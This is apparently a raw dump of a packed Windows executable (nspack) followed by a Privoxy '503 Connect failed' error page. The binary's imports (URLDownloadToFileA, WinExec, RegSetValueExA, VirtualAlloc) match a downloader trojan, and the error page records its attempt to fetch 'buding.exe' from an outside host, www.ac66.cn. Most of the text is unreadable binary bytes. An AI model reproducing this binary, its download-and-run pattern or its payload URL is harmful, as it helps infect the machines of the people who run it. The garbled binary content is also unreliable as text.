MZ@       ��         @  ��  �	��!�L�!packed by nspack$@   PE  L ҅�E        � ��      @   �        �    @                      0    K[         @                       ��  �    �                      �  �                          ��                                                     nsp0     �     {   �              `  �nsp1    �D   �  z1                 `  � �                      �  �                           �                                                     CODE    %	       �      ��                                                     �                                    �                          �%              ��  ��  ��  �  �  -�      ;�      N�      `�      u�      ��      ��                  ��  ��              ��  ��              ��  ��              ��  ��              ��  ��              ��  ��              ��  ��                      KERNEL32.DLL ADVAPI32.DLL USER32.DLL URLMON.DLL KERNEL32.DLL ADVAPI32.DLL KERNEL32.DLL   LoadLibraryA   GetProcAddress   VirtualProtect   VirtualAlloc   VirtualFree   ExitProcess   RegQueryValueExA   GetKeyboardType   URLDownloadToFileA   DeleteCriticalSection   RegSetValueExA   WinExec       �>         �   �  �w��.c��`�    ]�   +荵������� t����������K  �   �Ջ�E���+Љ�E����u����������6��`j@h   h   j ���������V  ��m����    [�T  �PS�  a�5����߃? u
���    ��   ;���; t6�3{WQRS�������������֋ϋ�m����  ��[ZY_�� t����h �  j ��m�����������u����N�V�6���� t?�G,�<w���z t�8u�_f�������
�_������+�Ɖ���������*  �������A�� ��   ��+qtz�q�������6�^����t
��y�I���y�I3��G�t <�w���$��f����u�����3ۇ���� t��t�f��3�����t�f��E�������������uBVVRVjh   R������_^����  ���   ������V�v�h   W�������݁�!   3Ɋ�� t(C��E����VQSRV�3�s�C�P������Z[Y^����a��������=������   ��E����> u�~ u�~ u�z�^�SRV������~��W������_Z[�� tY��M���>��3Ɋ�� uF볋��RSP�8�u@� %����� QP��M���������YZ[Z�� t��F��v����F����   U��u�}�����m   s�3��d   s3��[   s!��R   �s�uA����P   I����D   �.���tO�����"�H������)   = }  s=   s��wAAV��+��^��u�F��3�A�����������r��]� j ������Ë ;Qu
�A8`�ÊB���D$�8agV <ЃI�j�X^��s��� ����N�|Au�^ SV�q3ۅ�W y~,U��9���;�r+Ѓ�:����s��5腉A� �Mu�]��b_�z^�9�[g��.��W�9����x<�� ~;�s@�cF��f�4п=��+��� �f�9�~�P\��)�*�N��:quf�r��B+О��V���ޏ�
���ꡞ¿�F���>@_^���QSv}�(����~�]���U�4��>1�?���M�u�^�B����_[	�*:3v���90W��B9}����P�~ V�xB�
�GϠ��	E�G;H$|�6�H�a��2���@�n���Ϩ��p=��(|�V[�jP�3��(RC�7u���e����F��L�vG7�s���;�u��C@��dW�E�vEY��3���Å�V������A��&u*�W�j�L0aZ�܏1�;�N���2P$Wu�K$D��"N����j���B���,�|�8�&T��M�H3G���HRzQ��יM���Q����f4K�M� �@����6Z
2�JO�89M`U�.�sjX�ᄘv�u���n��^@���f�
�u@�M����G�} �p�]�$#�3 ؃����fG��� ���N�U�dD��vĂ�#�G��*M�A��!�G���@ 	;���l}e��${
u=�r�
���`t ��s+`���y�U�Ae�l������T)j�C�~�i3���bF�;�����d-:�F�/��/uEIG%���
F��uX9��j�U�(�>���+#��D�	����r�f3�Jc��J�HX�DF1u�H��'+VȊ�.���	uv���p;�m��Q�E���h
�2�UՄ���#~H���ϲ#魄����[���ڄ�,�dR2"
7�P���H�|�}IX�(Q�zI�&`K�t(��!|I��я�##�J��a��1>�*]}HQ�;+�^N^�:�]p�!�����H>�E�Pj�"�DZ���i��	b�����I40L�y<w:~sI��8B�Ǌ�@9A@J��C�~;� r�����������+�n�u�xâ��]r��������Hr�D閕�U.X-.]_ r2�����]��T����Hu�<	uM�9��-�����a��h�$��L��SR�㝚wA��!zC��(�� 䈤���$e:@3I��Fn�j�.�@��
�_�=��0  �@ �@ �P@                 ]    z%   �   !=�H4���e7�q�oG���Q�{�~~�?�������բw:ŖA�r?F�[�W<O��a� �"�^���KΜ4�e����7#n�i0�H�L�LGcgq�라�#�i&J#�s�J����x�?���Ks�b۝�χ��<2?2*�%���ˁ���FԶ� Y#�jt_�.�'��n� ���W�F�!d�����?v��ć��a�-��$a���0�!�sL��b��A�*V��)\�i����R�wb6=8���ɟ��ґ�t�G=��ohK4o��E�c$�T_�Sn�.5�ξ��(�]�*q��� |����e�l�Y���]_uN-��%yO��2N!$X�`���dTB��mt'Xd@.���5oNf�N����Qq�!���(���|�W"���P�4T��:Ǘ�.�<F1u=�G���v7�}��l�kO�b3���d�'����Ya��	�P��{gC�{��@Õ�>���$1c��/��K�� {$����\��$)#[���������}��^_B~����l���;�v��='z�">��	����0��a�j։N�'�ٔ��\�q�hv`������L��Κ5&E�FC13�cѻ����,\�����M��or$�T���<Ǻ�UNpt5کw`E�jG��$sG��Do�W[��`�KX��p��������-:����U&Z�����#K�qi`���$�aԴR��"�(�e�҂T���qYM`�n�dq��wL�����X���i?J�6T��+q��t�I�/l�����M�#6=�r�@'{�{�rq��\�~�_����_J�w����xlCf��W��k��B?�0IAt!��SU���\o�d���_D�D �Q�,P*�mR�:+K���lՈ!H0s� s�t��c�5>ëL�N��ڝ��5��)�5�^f���+L-�����eyi��K�$��;�v!8�n@^�>4�Yuo�B-3�������l�^twk�Sj�����L��1�{�e��	(!���{�3u�{���R�5� ��8G����[ʩ��9�s^9�����N�+��k�i4=R2|vS&�w�ֈ�w��^��&J)�u�6�#"�\�����p�O۰�N���R�d�圶%D��~G�G�J�ĵ(���ȝ5_	�������E
���d����e��7,?���jg������ŗ�dMSz����`5��a�LN�ޚ��ZHV�u5����B&gŧ���;�}�SK��f��2��m��E��Ks���?�"���ɯ����,��NÇ���Z�K���j���7#H������W�w�__A"����}Q	�U����b�5�J��۽��+pm�}� �"���i�7ۯ�x�G�zJǡ׮���Y��t��H�]�̘4RĖY+[��u,Vg�<�.�R`�!81|#��ɞ�IB�vzO�#���dH
����L����S��|�hK
^����4%ꁚ����f[Iap�x��$���
)Qf�ƥ��r�xţ���f�#�Mx�\���AE��3g�`���1}�:���\
A�9O�m�eW@��p �$bͅ/�b|U�r�"+~]����	Ͻ��A�������������E�Lق�~�����:���: ӭl8���.�1Η� ��0%�`�Xև�Ka�Ԯc���oS��:���VJS�۰3�� e�!t�⟌@��
��p�����M����45��0AM��)n�HRL����7ep;��`�s�F�%���u���͕�:���*�� B�>��KjP�2#M5|jʌ�+!|���+A�.��90�ʚ�A�	,�d�
�s�/�b']������;���8i�3���F�9Q{%�UÒ�*��~���]�U��J����n�����N�3� ���,�v�E�[��͙f�ʹ7�;�q�v6�H݋ەd����e<���@�)��
�4$�I��d�'ø�E�wi�Ղן���������vc�QǕ��� �%������}�g��@3
j^zC�@R]*��N�g�pU79�;[��,�۝����'��Ɇ_z�9K���7���u��/�U�����6���������v��t�o�q���r|�Ef�}�w�h�_ڊ���O��x�v%G3r�MI.����}C����j��v)�v�#�9)( A�v�+;2�(������� ��.Ќ�MZK@謪�Q��
y�q��&��C_a*W��%Z�˦Vj���/#��#[���e��.zM��	O����[�u��-=�>`�)T��/�=]s�lw1 �?�����
v����朮Zލa&�~]<b���>�q�d�(�-H}��݄T� �2�M��B��,�e�EK�[�ɪjG�3Ho�	�f�nC�h��&�\�N��d�Y��5*2���
`�.�'��W.��ߛ�6I����t��s�X+G�c���1 ʎ�l�/)�GRV�RQl+T9�� I$T��畉��b�=A�iq��y��/���7��?��S�&��+⎜��k���~K� �W�_e��v�TT/�v����"�;*��:`dz�k��h��n�� *$��P����U��%bz�3�A{~d��T� ���rn�O��}���Lx�#
�6�~���#W�%�{�z/9�du��r�7��3�q� ��o�m�� d����B��,��'�w D��Oɇh?��U�F6�C��p��O��`$�F�dE9���XO��(aL	��'V��*���_�����q��!�kI�R�˱r~���MG����JMg��PKu Gk�G9N��I���R�A��u������%��/l4#-�c;`�9�cT��Wv o|��:��I
Jח������]/c��t�B"�8����$�dJ��r�YP��L������/}��J�����8�K�XȨ⣳��`I�|9��!=��qQ?ǣ:������;�ɤ�jS#��ɼ�r|QE�΢�W{�g
AX���ù�[�6�w��H>[7���K�N���` !�v�[&�A��{��l�z�ֲp2���mn��!u�W_̲S�Q`�����Y{eQhʹ�)�n�1�,PR��@�5��QQ2��;�yI�� P7���bߚGD�l7����~n�Mޞ^L�:ο��&͒;Z,��<��-d�逶^>RQ��D����gH���f:_�&����D���']n��&�.I1	��9����l ۭ��R%�J�Q2_N�P����z�f�S%_t��8(*���L����&�>�`�8�;� �� y����%?`���s��r~,)�uD���
�Q?�#��D��c���_��RFF�xOS�?0�G�	���K2NV?p��g₳J��9+&��`<�yP�����xɶ)A%ue��߆![�8�����_��;N�Kvauk���z�;D�)������IR7��8��0��w���!����q�^��&�����Lm����x�>�����*[wx���{��[� t�2Đ�j� o�):���'/[�����K�9%�2Eٞ�?�'�t��������d�� ��!�B��?�U �;���D�^��d��m�I�>�A�O��w���[�`��eA
���)f��`�
ɵ������5��X� Ft��9߈��U�#���sf��m�x�m�����i����35L�#�)%ʼ*`�:]NA��A�s�O�%���Q�{����f��c
qWS[�X-�>̩�����̌g4~?�g1+4̏��a�g��M�� Y�Q�THB������֝;�r��ߴ*��~�snp��a��]}=�a���Xl:f.�b����:[�u��*,ʧq�ŋY�8�'m%��K"e���:i���s�T��=�y���Z��Ў���Ls�*��E�#Emo˂X�j#��I!f�,��U��֧(�7yg�0eQ���_Ƹ�R{x�=H:aҥ�9�΀fM�I=�������Hj�֘��؂�G�Jwܡf脇sJ~�FG5��%YQ����n����wW��j>�9�A�����N�;��$"%�{>��gQ�w�=gW[�P���x�5��~Κ��o�ٻ�7$����Df����H�U4�bĠZ'׈:��á`0�')؅��LZBC.����p�4M���w$��\UZ(���Z��#�~�2\����!ϒ�� !M��FE k�`��艥"`V7���^^;�]��P�:Ͳ�31�.W��4�<h��e{V�+!�D	�<"7WCr-�F�g�5���M6�'�d�f{/�$d��j��j�O�|��#���V{@VB��:�zgk<s�n����g��t�0�c��n]\[�l��X���쿃��[���3	½����I��� �4G1�ǁ�V�X���"��U
3�R����7�;����#҄��׶pu��:ze@��o� )��gk�U������eک��%��
�+�L7�&`{�d�H�R����	>���5�������%^
�)���u�G��lK��"�k[��_g�Q�d����]{k% �~/�iRg��P|��i�=����9�D��#�J�p����i�ި��F��e�0�Ɵ�S���5¤��ܩT���=�r�k�te%%=�=��0Rr�(s��g��}��C�OTi����e	��g2�K�����+�;[m
��t�(���Dn���u8�����Рn�������鐷�.��J �ml��
�K�X���]��-�c�*&�J^hI�;//O��tP �(���՘��"1�B�ڋ+�Z'�N#�dj%�G�"�KHTTP/1.0 503 Connect failed
Content-Length: 3582
Content-Type: text/html
Cache-Control: no-cache
Date: Wed, 24 Jan 2007 04:46:35 GMT
Last-Modified: Wed, 08 Jun 1955 12:00:00 GMT
Expires: Sat, 17 Jun 2000 12:00:00 GMT
Pragma: no-cache
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
  <title>503 - Connect failed (Privoxy@localhost)</title>
  <meta http-equiv="Refresh" content="0; URL=http://192.168.7.220:9999">
  <meta http-equiv="Content-Style-Type" content="text/css">
  <meta http-equiv="Content-Script-Type" content="text/javascript">
  <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
  <meta name="robots" content="noindex,nofollow">
  <link rel="stylesheet" type="text/css" href="http://config.privoxy.org/send-stylesheet">
</head>

<body>

  <table cellpadding="20" cellspacing="10" border="0" width="100%">
    <tr>
      <td class="status">
        503
      </td>     
      <td class="title" style="width: 100%">

        <h1>
          This is <a href="http://www.privoxy.org/">Privoxy</a> 3.0.6 on localhost (127.0.0.1), port 8118<!-- @if-can-toggle-start -->,
          enabled<!-- if-can-toggle-end@ -->
        </h1>

      </td>
    </tr>

<!--  -->

    <tr>
      <td class="warning" colspan=2>
        <h2>Connect failed</h2>
          <p>Your request for <a href="http://www.ac66.cn/88/buding.exe"><b>http://www.ac66.cn/88/buding.exe</b></a> could
            not be fulfilled, because the connection to <b>www.ac66.cn</b> (125.65.165.187) could not be established.
          </p>
          <p>This is often a temporary failure, so you might just
            <a href="http://www.ac66.cn/88/buding.exe">try again</a>.
         </p>
      </td>
    </tr>

    <tr>
      <td class="box" colspan="2">
        <h2>More Privoxy:</h2>
        <ul><li><a href="http://config.privoxy.org/">Privoxy main page</a></li><li><a href="http://config.privoxy.org/show-status">View & change the current configuration</a></li><li><a href="http://config.privoxy.org/show-version">View the source code version numbers</a></li><li><a href="http://config.privoxy.org/show-request">View the request headers.</a></li><li><a href="http://config.privoxy.org/show-url-info">Look up which actions apply to a URL and why</a></li><li><a href="http://config.privoxy.org/toggle">Toggle Privoxy on or off</a></li><li><a href="http://config.privoxy.org/user-manual/">Documentation</a></li></ul>
      </td>
    </tr>

    <tr>
      <td class="info" colspan="2">

        <h2>Support and Service via Sourceforge:</h2>
        <p>
          We value your feedback. To provide you with the best support,
          we ask that you:
        </p>
        <ul>
          <li>
            use the <a href="http://sourceforge.net/tracker/?group_id=11118&amp;atid=211118">support forum</a> to get help.
          </li>
          <li>
            submit ads and configuration related problems with the actions file  through the
            <a
            href="http://sourceforge.net/tracker/?group_id=11118&amp;atid=460288">
            Actionsfile Feedback Tracker.</a>
          </li>
          <li>
            submit bugs only through our <a href="http://sourceforge.net/tracker/?group_id=11118&amp;atid=111118">bug tracker</a>.
            Make sure that the bug has not yet been submitted.
          </li>
          <li>
            submit feature requests only through our <a href="http://sourceforge.net/tracker/?atid=361118&amp;group_id=11118&amp;func=browse">feature
            request tracker</a>.
          </li>
        </ul>

      </td>
    </tr>

<!--  -->

    <tr>
      <td colspan="2">
        <p class="small">Valid <a href="http://validator.w3.org/">HTML 4.01 Strict</a></p>
      </td>
    </tr>
    
  </table>

</body>
</html>
